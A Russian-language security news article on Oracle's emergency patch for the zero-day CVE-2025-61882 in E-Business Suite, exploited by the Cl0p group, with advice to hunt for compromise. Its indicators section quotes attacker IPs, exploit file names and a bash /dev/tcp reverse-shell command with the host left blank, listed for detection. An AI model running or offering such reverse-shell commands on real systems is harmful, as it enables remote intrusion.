Ssylka

Почему экстренный патч Oracle не спасет от уже свершившихся атак?

Компания Oracle выпустила экстренное обновление безопасности для устранения критической уязвимости нулевого дня (CVE-2025-61882) в своем продукте E-Business Suite. Выпуск патча был вызван активной эксплуатацией уязвимости в реальных условиях хакерской группировкой Cl0p, которая использовала ее в августе 2025 года для проведения широкомасштабной кампании по краже данных у множества организаций.
Почему экстренный патч Oracle не спасет от уже свершившихся атак?
Изображение носит иллюстративный характер

Уязвимость CVE-2025-61882 получила оценку 9.8 из 10 по шкале CVSS, что соответствует критическому уровню опасности. Проблема затрагивает компонент Oracle Concurrent Processing и может быть использована удаленно через сеть по протоколу HTTP без какой-либо аутентификации. Успешная эксплуатация позволяет злоумышленнику полностью скомпрометировать компонент и выполнить произвольный код на целевой системе.

За атаками стоит известная группа вымогателей Cl0p. В августе 2025 года она провела кампанию, которую компания Mandiant (принадлежащая Google) охарактеризовала как «массовую рассылку по электронной почте», запущенную с сотен скомпрометированных учетных записей. Целью кампании была кража больших объемов конфиденциальной информации.

Анализ показал, что Cl0p использовала комбинированный подход. Группировка эксплуатировала как ранее известные уязвимости в Oracle E-Business Suite, исправленные в обновлении от июля 2025 года, так и новую уязвимость нулевого дня CVE-2025-61882, что позволило достичь максимального охвата целей.

Роб Духарт, директор по безопасности Oracle, сообщил, что исправления для CVE-2025-61882 также включают обновления против «дополнительной потенциальной эксплуатации», выявленной в ходе внутреннего расследования компании. Это указывает на комплексный характер угрозы, обнаруженной специалистами Oracle.

Ключевое предупреждение исходит от Чарльза Кармакала, технического директора Mandiant в Google Cloud. В своем сообщении на LinkedIn он подчеркнул, что массовая эксплуатация уязвимости нулевого дня уже произошла. Это означает, что многие организации могли быть скомпрометированы еще до выхода официального патча.

В связи с этим Кармакал настоятельно рекомендует всем организациям, использующим Oracle E-Business Suite, провести тщательное расследование своих систем на предмет возможной компрометации. Простая установка обновления не гарантирует безопасность, если злоумышленники уже получили доступ к инфраструктуре.

Ожидается, что после публикации информации об уязвимости другие киберпреступные группы также начнут ее использовать. Этот процесс, известный как «эксплуатация n-day», представляет дополнительную угрозу для компаний, которые не успеют оперативно установить исправление и проверить свои системы на наличие следов взлома.

Для выявления компрометации системным администраторам рекомендуется проверить наличие подозрительной активности, связанной со следующими индикаторами. Была зафиксирована сетевая активность (GET и POST запросы) с IP-адресов 107.207[.]26 и 185.181.60[.]11.

В системах может присутствовать вредоносная команда оболочки, предназначенная для создания обратного TCP-соединения (reverse shell) с сервером злоумышленника: sh -c /bin/bash -i >& /dev/tcp// 0>&1.

Также следует обратить внимание на наличие файлов с именами, указывающими на эксплуатацию уязвимости. К таким файлам относятся: oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip, oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py и oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py.


Новое на сайте

18817Искусственный интеллект в математике: от олимпиадного золота до решения вековых проблем 18816Радиоактивный след в Арктике: путь цезия-137 от лишайника через оленей к коренным народам 18815Критическая уязвимость WatchGuard CVE-2025-14733 с рейтингом 9.3 уже эксплуатируется в... 18814Что подготовило ночное небо на праздники 2025 года и какие астрономические явления нельзя... 18813Зачем нубийские христиане наносили татуировки на лица младенцев 1400 лет назад? 18812Как увидеть метеорный поток Урсиды в самую длинную ночь 2025 года? 18811Кто стоял за фишинговой империей RaccoonO365 и как спецслужбы ликвидировали угрозу... 18810Как злоумышленники могут использовать критическую уязвимость UEFI для взлома плат ASRock,... 18809Как наблюдать максимальное сближение с землей третьей межзвездной кометы 3I/ATLAS? 18808Передовая римская канализация не спасла легионеров от тяжелых кишечных инфекций 18807Способен ли вулканический щебень на дне океана работать как гигантская губка для... 18806Зонд NASA Europa Clipper успешно запечатлел межзвездную комету 3I/ATLAS во время полета к... 18805Может ли перенос лечения на первую половину дня удвоить выживаемость при раке легких? 18804Новая китайская группировка LongNosedGoblin использует легальные облачные сервисы для... 18803Генетический анализ раскрыл древнейший случай кровосмешения первой степени в итальянской...